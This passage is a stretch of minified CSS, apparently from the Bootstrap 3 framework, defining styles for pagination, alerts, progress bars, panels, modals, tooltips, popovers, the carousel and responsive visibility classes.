16px;font-size:18px}.pagination-lg>li:first-child>a,.pagination-lg>li:first-child>span{border-bottom-left-radius:6px;border-top-left-radius:6px}.pagination-lg>li:last-child>a,.pagination-lg>li:last-child>span{border-top-right-radius:6px;border-bottom-right-radius:6px}.pagination-sm>li>a,.pagination-sm>li>span{padding:5px 10px;font-size:12px}.pagination-sm>li:first-child>a,.pagination-sm>li:first-child>span{border-bottom-left-radius:3px;border-top-left-radius:3px}.pagination-sm>li:last-child>a,.pagination-sm>li:last-child>span{border-top-right-radius:3px;border-bottom-right-radius:3px}.pager{padding-left:0;margin:20px 0;text-align:center;list-style:none}.pager:before,.pager:after{display:table;content:" "}.pager:after{clear:both}.pager:before,.pager:after{display:table;content:" "}.pager:after{clear:both}.pager li{display:inline}.pager li>a,.pager li>span{display:inline-block;padding:5px 14px;background-color:#fff;border:1px solid #ddd;border-radius:15px}.pager li>a:hover,.pager li>a:focus{text-decoration:none;background-color:#eee}.pager .next>a,.pager .next>span{float:right}.pager .previous>a,.pager .previous>span{float:left}.pager .disabled>a,.pager .disabled>a:hover,.pager .disabled>a:focus,.pager .disabled>span{color:#999;cursor:not-allowed;background-color:#fff}.label{display:inline;padding:.2em .6em .3em;font-size:75%;font-weight:bold;line-height:1;color:#fff;text-align:center;white-space:nowrap;vertical-align:baseline;border-radius:.25em}.label[href]:hover,.label[href]:focus{color:#fff;text-decoration:none;cursor:pointer}.label:empty{display:none}.label-default{background-color:#999}.label-default[href]:hover,.label-default[href]:focus{background-color:#808080}.label-primary{background-color:#428bca}.label-primary[href]:hover,.label-primary[href]:focus{background-color:#3071a9}.label-success{background-color:#5cb85c}.label-success[href]:hover,.label-success[href]:focus{background-color:#449d44}.label-info{background-color:#5bc0de}.label-info[href]:hover,.label-info[href]:focus{background-color:#31b0d5}.label-warning{background-color:#f0ad4e}.label-warning[href]:hover,.label-warning[href]:focus{background-color:#ec971f}.label-danger{background-color:#d9534f}.label-danger[href]:hover,.label-danger[href]:focus{background-color:#c9302c}.badge{display:inline-block;min-width:10px;padding:3px 7px;font-size:12px;font-weight:bold;line-height:1;color:#fff;text-align:center;white-space:nowrap;vertical-align:baseline;background-color:#999;border-radius:10px}.badge:empty{display:none}a.badge:hover,a.badge:focus{color:#fff;text-decoration:none;cursor:pointer}.btn .badge{position:relative;top:-1px}a.list-group-item.active>.badge,.nav-pills>.active>a>.badge{color:#428bca;background-color:#fff}.nav-pills>li>a>.badge{margin-left:3px}.jumbotron{padding:30px;margin-bottom:30px;font-size:21px;font-weight:200;line-height:2.1428571435;color:inherit;background-color:#eee}.jumbotron h1{line-height:1;color:inherit}.jumbotron p{line-height:1.4}.container .jumbotron{border-radius:6px}@media screen and (min-width:768px){.jumbotron{padding-top:48px;padding-bottom:48px}.container .jumbotron{padding-right:60px;padding-left:60px}.jumbotron h1{font-size:63px}}.thumbnail{display:inline-block;display:block;height:auto;max-width:100%;padding:4px;line-height:1.428571429;background-color:#fff;border:1px solid #ddd;border-radius:4px;-webkit-transition:all .2s ease-in-out;transition:all .2s ease-in-out}.thumbnail>img{display:block;height:auto;max-width:100%}a.thumbnail:hover,a.thumbnail:focus{border-color:#428bca}.thumbnail>img{margin-right:auto;margin-left:auto}.thumbnail .caption{padding:9px;color:#333}.alert{padding:15px;margin-bottom:20px;border:1px solid transparent;border-radius:4px}.alert h4{margin-top:0;color:inherit}.alert .alert-link{font-weight:bold}.alert>p,.alert>ul{margin-bottom:0}.alert>p+p{margin-top:5px}.alert-dismissable{padding-right:35px}.alert-dismissable .close{position:relative;top:-2px;right:-21px;color:inherit}.alert-success{color:#468847;background-color:#dff0d8;border-color:#d6e9c6}.alert-success hr{border-top-color:#c9e2b3}.alert-success .alert-link{color:#356635}.alert-info{color:#3a87ad;background-color:#d9edf7;border-color:#bce8f1}.alert-info hr{border-top-color:#a6e1ec}.alert-info .alert-link{color:#2d6987}.alert-warning{color:#c09853;background-color:#fcf8e3;border-color:#fbeed5}.alert-warning hr{border-top-color:#f8e5be}.alert-warning .alert-link{color:#a47e3c}.alert-danger{color:#b94a48;background-color:#f2dede;border-color:#eed3d7}.alert-danger hr{border-top-color:#e6c1c7}.alert-danger .alert-link{color:#953b39}@-webkit-keyframes progress-bar-stripes{from{background-position:40px 0}to{background-position:0 0}}@-moz-keyframes progress-bar-stripes{from{background-position:40px 0}to{background-position:0 0}}@-o-keyframes progress-bar-stripes{from{background-position:0 0}to{background-position:40px 0}}@keyframes progress-bar-stripes{from{background-position:40px 0}to{background-position:0 0}}.progress{height:20px;margin-bottom:20px;overflow:hidden;background-color:#f5f5f5;border-radius:4px;-webkit-box-shadow:inset 0 1px 2px rgba(0,0,0,0.1);box-shadow:inset 0 1px 2px rgba(0,0,0,0.1)}.progress-bar{float:left;width:0;height:100%;font-size:12px;color:#fff;text-align:center;background-color:#428bca;-webkit-box-shadow:inset 0 -1px 0 rgba(0,0,0,0.15);box-shadow:inset 0 -1px 0 rgba(0,0,0,0.15);-webkit-transition:width .6s ease;transition:width .6s ease}.progress-striped .progress-bar{background-image:-webkit-gradient(linear,0 100%,100% 0,color-stop(0.25,rgba(255,255,255,0.15)),color-stop(0.25,transparent),color-stop(0.5,transparent),color-stop(0.5,rgba(255,255,255,0.15)),color-stop(0.75,rgba(255,255,255,0.15)),color-stop(0.75,transparent),to(transparent));background-image:-webkit-linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);background-image:-moz-linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);background-image:linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);background-size:40px 40px}.progress.active .progress-bar{-webkit-animation:progress-bar-stripes 2s linear infinite;-moz-animation:progress-bar-stripes 2s linear infinite;-ms-animation:progress-bar-stripes 2s linear infinite;-o-animation:progress-bar-stripes 2s linear infinite;animation:progress-bar-stripes 2s linear infinite}.progress-bar-success{background-color:#5cb85c}.progress-striped .progress-bar-success{background-image:-webkit-gradient(linear,0 100%,100% 0,color-stop(0.25,rgba(255,255,255,0.15)),color-stop(0.25,transparent),color-stop(0.5,transparent),color-stop(0.5,rgba(255,255,255,0.15)),color-stop(0.75,rgba(255,255,255,0.15)),color-stop(0.75,transparent),to(transparent));background-image:-webkit-linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);background-image:-moz-linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);background-image:linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent)}.progress-bar-info{background-color:#5bc0de}.progress-striped .progress-bar-info{background-image:-webkit-gradient(linear,0 100%,100% 0,color-stop(0.25,rgba(255,255,255,0.15)),color-stop(0.25,transparent),color-stop(0.5,transparent),color-stop(0.5,rgba(255,255,255,0.15)),color-stop(0.75,rgba(255,255,255,0.15)),color-stop(0.75,transparent),to(transparent));background-image:-webkit-linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);background-image:-moz-linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);background-image:linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent)}.progress-bar-warning{background-color:#f0ad4e}.progress-striped .progress-bar-warning{background-image:-webkit-gradient(linear,0 100%,100% 0,color-stop(0.25,rgba(255,255,255,0.15)),color-stop(0.25,transparent),color-stop(0.5,transparent),color-stop(0.5,rgba(255,255,255,0.15)),color-stop(0.75,rgba(255,255,255,0.15)),color-stop(0.75,transparent),to(transparent));background-image:-webkit-linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);background-image:-moz-linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);background-image:linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent)}.progress-bar-danger{background-color:#d9534f}.progress-striped .progress-bar-danger{background-image:-webkit-gradient(linear,0 100%,100% 0,color-stop(0.25,rgba(255,255,255,0.15)),color-stop(0.25,transparent),color-stop(0.5,transparent),color-stop(0.5,rgba(255,255,255,0.15)),color-stop(0.75,rgba(255,255,255,0.15)),color-stop(0.75,transparent),to(transparent));background-image:-webkit-linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);background-image:-moz-linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);background-image:linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent)}.media,.media-body{overflow:hidden;zoom:1}.media,.media .media{margin-top:15px}.media:first-child{margin-top:0}.media-object{display:block}.media-heading{margin:0 0 5px}.media>.pull-left{margin-right:10px}.media>.pull-right{margin-left:10px}.media-list{padding-left:0;list-style:none}.list-group{padding-left:0;margin-bottom:20px}.list-group-item{position:relative;display:block;padding:10px 15px;margin-bottom:-1px;background-color:#fff;border:1px solid #ddd}.list-group-item:first-child{border-top-right-radius:4px;border-top-left-radius:4px}.list-group-item:last-child{margin-bottom:0;border-bottom-right-radius:4px;border-bottom-left-radius:4px}.list-group-item>.badge{float:right}.list-group-item>.badge+.badge{margin-right:5px}a.list-group-item{color:#555}a.list-group-item .list-group-item-heading{color:#333}a.list-group-item:hover,a.list-group-item:focus{text-decoration:none;background-color:#f5f5f5}.list-group-item.active,.list-group-item.active:hover,.list-group-item.active:focus{z-index:2;color:#fff;background-color:#428bca;border-color:#428bca}.list-group-item.active .list-group-item-heading,.list-group-item.active:hover .list-group-item-heading,.list-group-item.active:focus .list-group-item-heading{color:inherit}.list-group-item.active .list-group-item-text,.list-group-item.active:hover .list-group-item-text,.list-group-item.active:focus .list-group-item-text{color:#e1edf7}.list-group-item-heading{margin-top:0;margin-bottom:5px}.list-group-item-text{margin-bottom:0;line-height:1.3}.panel{margin-bottom:20px;background-color:#fff;border:1px solid transparent;border-radius:4px;-webkit-box-shadow:0 1px 1px rgba(0,0,0,0.05);box-shadow:0 1px 1px rgba(0,0,0,0.05)}.panel-body{padding:15px}.panel-body:before,.panel-body:after{display:table;content:" "}.panel-body:after{clear:both}.panel-body:before,.panel-body:after{display:table;content:" "}.panel-body:after{clear:both}.panel>.list-group{margin-bottom:0}.panel>.list-group .list-group-item{border-width:1px 0}.panel>.list-group .list-group-item:first-child{border-top-right-radius:0;border-top-left-radius:0}.panel>.list-group .list-group-item:last-child{border-bottom:0}.panel-heading+.list-group .list-group-item:first-child{border-top-width:0}.panel>.table{margin-bottom:0}.panel>.panel-body+.table{border-top:1px solid #ddd}.panel-heading{padding:10px 15px;border-bottom:1px solid transparent;border-top-right-radius:3px;border-top-left-radius:3px}.panel-title{margin-top:0;margin-bottom:0;font-size:16px}.panel-title>a{color:inherit}.panel-footer{padding:10px 15px;background-color:#f5f5f5;border-top:1px solid #ddd;border-bottom-right-radius:3px;border-bottom-left-radius:3px}.panel-group .panel{margin-bottom:0;overflow:hidden;border-radius:4px}.panel-group .panel+.panel{margin-top:5px}.panel-group .panel-heading{border-bottom:0}.panel-group .panel-heading+.panel-collapse .panel-body{border-top:1px solid #ddd}.panel-group .panel-footer{border-top:0}.panel-group .panel-footer+.panel-collapse .panel-body{border-bottom:1px solid #ddd}.panel-default{border-color:#ddd}.panel-default>.panel-heading{color:#333;background-color:#f5f5f5;border-color:#ddd}.panel-default>.panel-heading+.panel-collapse .panel-body{border-top-color:#ddd}.panel-default>.panel-footer+.panel-collapse .panel-body{border-bottom-color:#ddd}.panel-primary{border-color:#428bca}.panel-primary>.panel-heading{color:#fff;background-color:#428bca;border-color:#428bca}.panel-primary>.panel-heading+.panel-collapse .panel-body{border-top-color:#428bca}.panel-primary>.panel-footer+.panel-collapse .panel-body{border-bottom-color:#428bca}.panel-success{border-color:#d6e9c6}.panel-success>.panel-heading{color:#468847;background-color:#dff0d8;border-color:#d6e9c6}.panel-success>.panel-heading+.panel-collapse .panel-body{border-top-color:#d6e9c6}.panel-success>.panel-footer+.panel-collapse .panel-body{border-bottom-color:#d6e9c6}.panel-warning{border-color:#fbeed5}.panel-warning>.panel-heading{color:#c09853;background-color:#fcf8e3;border-color:#fbeed5}.panel-warning>.panel-heading+.panel-collapse .panel-body{border-top-color:#fbeed5}.panel-warning>.panel-footer+.panel-collapse .panel-body{border-bottom-color:#fbeed5}.panel-danger{border-color:#eed3d7}.panel-danger>.panel-heading{color:#b94a48;background-color:#f2dede;border-color:#eed3d7}.panel-danger>.panel-heading+.panel-collapse .panel-body{border-top-color:#eed3d7}.panel-danger>.panel-footer+.panel-collapse .panel-body{border-bottom-color:#eed3d7}.panel-info{border-color:#bce8f1}.panel-info>.panel-heading{color:#3a87ad;background-color:#d9edf7;border-color:#bce8f1}.panel-info>.panel-heading+.panel-collapse .panel-body{border-top-color:#bce8f1}.panel-info>.panel-footer+.panel-collapse .panel-body{border-bottom-color:#bce8f1}.well{min-height:20px;padding:19px;margin-bottom:20px;background-color:#f5f5f5;border:1px solid #e3e3e3;border-radius:4px;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,0.05);box-shadow:inset 0 1px 1px rgba(0,0,0,0.05)}.well blockquote{border-color:#ddd;border-color:rgba(0,0,0,0.15)}.well-lg{padding:24px;border-radius:6px}.well-sm{padding:9px;border-radius:3px}.close{float:right;font-size:21px;font-weight:bold;line-height:1;color:#000;text-shadow:0 1px 0 #fff;opacity:.2;filter:alpha(opacity=20)}.close:hover,.close:focus{color:#000;text-decoration:none;cursor:pointer;opacity:.5;filter:alpha(opacity=50)}button.close{padding:0;cursor:pointer;background:transparent;border:0;-webkit-appearance:none}.modal-open{overflow:hidden}body.modal-open,.modal-open .navbar-fixed-top,.modal-open .navbar-fixed-bottom{margin-right:15px}.modal{position:fixed;top:0;right:0;bottom:0;left:0;z-index:1040;display:none;overflow:auto;overflow-y:scroll}.modal.fade .modal-dialog{-webkit-transform:translate(0,-25%);-ms-transform:translate(0,-25%);transform:translate(0,-25%);-webkit-transition:-webkit-transform .3s ease-out;-moz-transition:-moz-transform .3s ease-out;-o-transition:-o-transform .3s ease-out;transition:transform .3s ease-out}.modal.in .modal-dialog{-webkit-transform:translate(0,0);-ms-transform:translate(0,0);transform:translate(0,0)}.modal-dialog{z-index:1050;width:auto;padding:10px;margin-right:auto;margin-left:auto}.modal-content{position:relative;background-color:#fff;border:1px solid #999;border:1px solid rgba(0,0,0,0.2);border-radius:6px;outline:0;-webkit-box-shadow:0 3px 9px rgba(0,0,0,0.5);box-shadow:0 3px 9px rgba(0,0,0,0.5);background-clip:padding-box}.modal-backdrop{position:fixed;top:0;right:0;bottom:0;left:0;z-index:1030;background-color:#000}.modal-backdrop.fade{opacity:0;filter:alpha(opacity=0)}.modal-backdrop.in{opacity:.5;filter:alpha(opacity=50)}.modal-header{min-height:16.428571429px;padding:15px;border-bottom:1px solid #e5e5e5}.modal-header .close{margin-top:-2px}.modal-title{margin:0;line-height:1.428571429}.modal-body{position:relative;padding:20px}.modal-footer{padding:19px 20px 20px;margin-top:15px;text-align:right;border-top:1px solid #e5e5e5}.modal-footer:before,.modal-footer:after{display:table;content:" "}.modal-footer:after{clear:both}.modal-footer:before,.modal-footer:after{display:table;content:" "}.modal-footer:after{clear:both}.modal-footer .btn+.btn{margin-bottom:0;margin-left:5px}.modal-footer .btn-group .btn+.btn{margin-left:-1px}.modal-footer .btn-block+.btn-block{margin-left:0}@media screen and (min-width:768px){.modal-dialog{right:auto;left:50%;width:600px;padding-top:30px;padding-bottom:30px}.modal-content{-webkit-box-shadow:0 5px 15px rgba(0,0,0,0.5);box-shadow:0 5px 15px rgba(0,0,0,0.5)}}.tooltip{position:absolute;z-index:1030;display:block;font-size:12px;line-height:1.4;opacity:0;filter:alpha(opacity=0);visibility:visible}.tooltip.in{opacity:.9;filter:alpha(opacity=90)}.tooltip.top{padding:5px 0;margin-top:-3px}.tooltip.right{padding:0 5px;margin-left:3px}.tooltip.bottom{padding:5px 0;margin-top:3px}.tooltip.left{padding:0 5px;margin-left:-3px}.tooltip-inner{max-width:200px;padding:3px 8px;color:#fff;text-align:center;text-decoration:none;background-color:#000;border-radius:4px}.tooltip-arrow{position:absolute;width:0;height:0;border-color:transparent;border-style:solid}.tooltip.top .tooltip-arrow{bottom:0;left:50%;margin-left:-5px;border-top-color:#000;border-width:5px 5px 0}.tooltip.top-left .tooltip-arrow{bottom:0;left:5px;border-top-color:#000;border-width:5px 5px 0}.tooltip.top-right .tooltip-arrow{right:5px;bottom:0;border-top-color:#000;border-width:5px 5px 0}.tooltip.right .tooltip-arrow{top:50%;left:0;margin-top:-5px;border-right-color:#000;border-width:5px 5px 5px 0}.tooltip.left .tooltip-arrow{top:50%;right:0;margin-top:-5px;border-left-color:#000;border-width:5px 0 5px 5px}.tooltip.bottom .tooltip-arrow{top:0;left:50%;margin-left:-5px;border-bottom-color:#000;border-width:0 5px 5px}.tooltip.bottom-left .tooltip-arrow{top:0;left:5px;border-bottom-color:#000;border-width:0 5px 5px}.tooltip.bottom-right .tooltip-arrow{top:0;right:5px;border-bottom-color:#000;border-width:0 5px 5px}.popover{position:absolute;top:0;left:0;z-index:1010;display:none;max-width:276px;padding:1px;text-align:left;white-space:normal;background-color:#fff;border:1px solid #ccc;border:1px solid rgba(0,0,0,0.2);border-radius:6px;-webkit-box-shadow:0 5px 10px rgba(0,0,0,0.2);box-shadow:0 5px 10px rgba(0,0,0,0.2);background-clip:padding-box}.popover.top{margin-top:-10px}.popover.right{margin-left:10px}.popover.bottom{margin-top:10px}.popover.left{margin-left:-10px}.popover-title{padding:8px 14px;margin:0;font-size:14px;font-weight:normal;line-height:18px;background-color:#f7f7f7;border-bottom:1px solid #ebebeb;border-radius:5px 5px 0 0}.popover-content{padding:9px 14px}.popover .arrow,.popover .arrow:after{position:absolute;display:block;width:0;height:0;border-color:transparent;border-style:solid}.popover .arrow{border-width:11px}.popover .arrow:after{border-width:10px;content:""}.popover.top .arrow{bottom:-11px;left:50%;margin-left:-11px;border-top-color:#999;border-top-color:rgba(0,0,0,0.25);border-bottom-width:0}.popover.top .arrow:after{bottom:1px;margin-left:-10px;border-top-color:#fff;border-bottom-width:0;content:" "}.popover.right .arrow{top:50%;left:-11px;margin-top:-11px;border-right-color:#999;border-right-color:rgba(0,0,0,0.25);border-left-width:0}.popover.right .arrow:after{bottom:-10px;left:1px;border-right-color:#fff;border-left-width:0;content:" "}.popover.bottom .arrow{top:-11px;left:50%;margin-left:-11px;border-bottom-color:#999;border-bottom-color:rgba(0,0,0,0.25);border-top-width:0}.popover.bottom .arrow:after{top:1px;margin-left:-10px;border-bottom-color:#fff;border-top-width:0;content:" "}.popover.left .arrow{top:50%;right:-11px;margin-top:-11px;border-left-color:#999;border-left-color:rgba(0,0,0,0.25);border-right-width:0}.popover.left .arrow:after{right:1px;bottom:-10px;border-left-color:#fff;border-right-width:0;content:" "}.carousel{position:relative}.carousel-inner{position:relative;width:100%;overflow:hidden}.carousel-inner>.item{position:relative;display:none;-webkit-transition:.6s ease-in-out left;transition:.6s ease-in-out left}.carousel-inner>.item>img,.carousel-inner>.item>a>img{display:block;height:auto;max-width:100%;line-height:1}.carousel-inner>.active,.carousel-inner>.next,.carousel-inner>.prev{display:block}.carousel-inner>.active{left:0}.carousel-inner>.next,.carousel-inner>.prev{position:absolute;top:0;width:100%}.carousel-inner>.next{left:100%}.carousel-inner>.prev{left:-100%}.carousel-inner>.next.left,.carousel-inner>.prev.right{left:0}.carousel-inner>.active.left{left:-100%}.carousel-inner>.active.right{left:100%}.carousel-control{position:absolute;top:0;bottom:0;left:0;width:15%;font-size:20px;color:#fff;text-align:center;text-shadow:0 1px 2px rgba(0,0,0,0.6);opacity:.5;filter:alpha(opacity=50)}.carousel-control.left{background-image:-webkit-gradient(linear,0 top,100% top,from(rgba(0,0,0,0.5)),to(rgba(0,0,0,0.0001)));background-image:-webkit-linear-gradient(left,color-stop(rgba(0,0,0,0.5) 0),color-stop(rgba(0,0,0,0.0001) 100%));background-image:-moz-linear-gradient(left,rgba(0,0,0,0.5) 0,rgba(0,0,0,0.0001) 100%);background-image:linear-gradient(to right,rgba(0,0,0,0.5) 0,rgba(0,0,0,0.0001) 100%);background-repeat:repeat-x;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#80000000',endColorstr='#00000000',GradientType=1)}.carousel-control.right{right:0;left:auto;background-image:-webkit-gradient(linear,0 top,100% top,from(rgba(0,0,0,0.0001)),to(rgba(0,0,0,0.5)));background-image:-webkit-linear-gradient(left,color-stop(rgba(0,0,0,0.0001) 0),color-stop(rgba(0,0,0,0.5) 100%));background-image:-moz-linear-gradient(left,rgba(0,0,0,0.0001) 0,rgba(0,0,0,0.5) 100%);background-image:linear-gradient(to right,rgba(0,0,0,0.0001) 0,rgba(0,0,0,0.5) 100%);background-repeat:repeat-x;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#00000000',endColorstr='#80000000',GradientType=1)}.carousel-control:hover,.carousel-control:focus{color:#fff;text-decoration:none;opacity:.9;filter:alpha(opacity=90)}.carousel-control .icon-prev,.carousel-control .icon-next,.carousel-control .glyphicon-chevron-left,.carousel-control .glyphicon-chevron-right{position:absolute;top:50%;left:50%;z-index:5;display:inline-block}.carousel-control .icon-prev,.carousel-control .icon-next{width:20px;height:20px;margin-top:-10px;margin-left:-10px;font-family:serif}.carousel-control .icon-prev:before{content:'\2039'}.carousel-control .icon-next:before{content:'\203a'}.carousel-indicators{position:absolute;bottom:10px;left:50%;z-index:15;width:60%;padding-left:0;margin-left:-30%;text-align:center;list-style:none}.carousel-indicators li{display:inline-block;width:10px;height:10px;margin:1px;text-indent:-999px;cursor:pointer;border:1px solid #fff;border-radius:10px}.carousel-indicators .active{width:12px;height:12px;margin:0;background-color:#fff}.carousel-caption{position:absolute;right:15%;bottom:20px;left:15%;z-index:10;padding-top:20px;padding-bottom:20px;color:#fff;text-align:center;text-shadow:0 1px 2px rgba(0,0,0,0.6)}.carousel-caption .btn{text-shadow:none}@media screen and (min-width:768px){.carousel-control .icon-prev,.carousel-control .icon-next{width:30px;height:30px;margin-top:-15px;margin-left:-15px;font-size:30px}.carousel-caption{right:20%;left:20%;padding-bottom:30px}.carousel-indicators{bottom:20px}}.clearfix:before,.clearfix:after{display:table;content:" "}.clearfix:after{clear:both}.pull-right{float:right!important}.pull-left{float:left!important}.hide{display:none!important}.show{display:block!important}.invisible{visibility:hidden}.text-hide{font:0/0 a;color:transparent;text-shadow:none;background-color:transparent;border:0}.affix{position:fixed}@-ms-viewport{width:device-width}@media screen and (max-width:400px){@-ms-viewport{width:320px}}.hidden{display:none!important;visibility:hidden!important}.visible-xs{display:none!important}tr.visible-xs{display:none!important}th.visible-xs,td.visible-xs{display:none!important}@media(max-width:767px){.visible-xs{display:block!important}tr.visible-xs{display:table-row!important}th.visible-xs,td.visible-xs{display:table-cell!important}}@media(min-width:768px) and (max-width:991px){.visible-xs.visible-sm{display:block!important}tr.visible-xs.visible-sm{display:table-row!important}th.visible-xs.visible-sm,td.visible-xs.visible-sm{display:table-cell!important}}@media(min-width:992px) and (max-width:1199px){.visible-xs.visible-md{display:block!important}tr.visible-xs.visible-md{display:table-row!important}th.visible-xs.visible-md,td.visible-xs.visible-md{display:table-cell!important}}@media(min-width:1200px){.visible-xs.visible-lg{display:block!important}tr.visible-xs.visible-lg{display:table-row!important}th.visible-xs.visible-lg,td.visible-xs.visible-lg{display:table-cell!important}}.visible-sm{display:none!important}tr.visible-sm{display:none!important}th.visible-sm,td.visible-sm{display:none!important}@media(max-width:767px){.visible-sm.visible-xs{display:block!important}tr.visible-sm.visible-xs{display:table-row!important}th.visible-sm.visible-xs,td.visible-sm.visible-xs{display:table-cell!important}}@media(min-width:768px) and (max-width:991px){.visible-sm{display:block!important}tr.visible-sm{display:table-row!important}th.visible-sm,td.visible-sm{display:table-cell!important}}@media(min-width:992px) and (max-width:1199px){.visible-sm.visible-md{display:block!important}tr.visible-sm.visible-md{display:table-row!important}th.visible-sm.visible-md,td.visible-sm.visible-md{display:table-cell!important}}@media(min-width:1200px){.visible-sm.visible-lg{display:block!important}tr.visible-sm.visible-lg{display:table-row!important}th.visible-sm.visible-lg,td.visible-sm.visible-lg{display:table-cell!important}}.visible-md{display:none!important}tr.visible-md{display:none!important}th.visible-md,td.visible-md{display:none!important}@media(max-width:767px){.visible-md.visible-xs{display:block!important}tr.visible-md.visible-xs{display:table-row!important}th.visible-md.visible-xs,td.visible-md.visible-xs{display:table-cell!important}}@media(min-width:768px) and (max-width:991px){.visible-md.visible-sm{display:block!important}tr.visible-md.visible-sm{display:table-row!important}th.visible-md.visible-sm,td.visible-md.visible-sm{display:table-cell!important}}@media(min-width:992px) and (max-width:1199px){.visible-md{display:block!important}tr.visible-md{display:table-row!important}th.visible-md,td.visible-md{display:table-cell!important}}@media(min-width:1200px){.visible-md.visible-lg{display:block!important}tr.visible-md.visible-lg{display:table-row!important}th.visible-md.visible-lg,td.visible-md.visible-lg{display:table-cell!important}}.visible-lg{display:none!important}tr.visible-lg{display:none!important}th.visible-lg,td.visible-lg{display:none!important}@media(max-width:767px){.visible-lg.visible-xs{display:block!important}tr.visible-lg.visible-xs{display:table-row!important}th.visible-lg.visible-xs,td.visible-lg.visible-xs{display:table-cell!important}}@media(min-width:768px) and (max-width:991px){.visible-lg.visible-sm{display:block!important}tr.visible-lg.visible-sm{display:table-row!important}th.visible-lg.visible-sm,td.visible-lg.visible-sm{display:table-cell!important}}@media(min-width:992px) and (max-width:1199px){.visible-lg.visible-md{display:block!important}tr.visible-lg.visible-md{display:table-row!important}th.visible-lg.visible-md,td.visible-lg.visible-md{display:table-cell!important}}@media(min-width:1200px){.visible-lg{display:block!important}tr.visible-lg{display:table-row!important}th.visible-lg,td.visible-lg{display:table-cell!important}}.hidden-xs{display:block!important}tr.hidden-xs{display:table-row!important}th.hidden-xs,td.hidden-xs{display:table-cell!important}@media(max-width:767px){.hidden-xs{display:none!important}tr.hidden-xs{display:none!important}th.hidden-xs,td.hidden-xs{display:none!important}}@media(min-width:768px) and (max-width:991px){.hidden-xs.hidden-sm{display:none!important}tr.hidden-xs.hidden-sm{display:none!important}th.hidden-xs.hidden-sm,td.hidden-xs.hidden-sm{display:none!important}}@media(min-width:992px) and (max-width:1199px){.hidden-xs.hidden-md{display:none!important}tr.hidden-xs.hidden-md{display:none!important}th.hidden-xs.hidden-md,td.hidden-xs.hidden-md{display:none!important}}@media(min-width:1200px){.hidden-xs.hidden-lg{display:none!important}tr.hidden-xs.hidden-lg{display:none!important}th.hidden-xs.hidden-lg,td.hidden-xs.hidden-lg{display:none!important}}.hidden-sm{display:block!important}tr.hidden-sm{display:table-row!important}th.hidden-sm,td.hidden-sm{display:table-cell!important}@media(max-width:767px){.hidden-sm.hidden-xs{display:none!important}tr.hidden-sm.hidden-xs{display:none!important}th.hidden-sm.hidden-xs,td.hidden-sm.hidden-xs{display:none!important}}@media(min-width:768px) and (max-width:991px){.hidden-sm{display:none!important}tr.hidden-sm{display:none!important}th.hidden-sm,td.hidden-sm{display:none!important}}@media(min-width:992px) and (max-width:1199px){.hidden-sm.hidden-md{display:none!important}tr.hidden-sm.hidden-md{display:none!important}th.hidden-sm.hidden-md,td.hidden-sm.hidden-md{display:none!important}}@media(min-width:1200px){.hidden-sm.hidden-lg{display:none!important}tr.hidden-sm.hidden-lg{display:none!important}th.hidden-sm.hidden-lg,td.hidden-sm.hidden-lg{display:none!important}}.hidden-md{display:block!important}tr.hidden-md{display:table-row!important}th.hidden-md,td.hidden-md{display:table-cell!important}@media(max-width:767px){.hidden-md.hidden-xs{display:none!important}tr.hidden-md.hidden-xs{display:none!important}th.hidden-md.hidden-xs,td.hidden-md.hidden-xs{display:none!important}}@media(min-width:768px) and (max-width:991px){.hidden-md.hidden-sm{display:none!important}tr.hidden-md.hidden-sm{display:none!important}th.hidden-md.hidden-sm,td.hidden-md.hidden-sm{display:none!important}}@media(min-width:992px) and 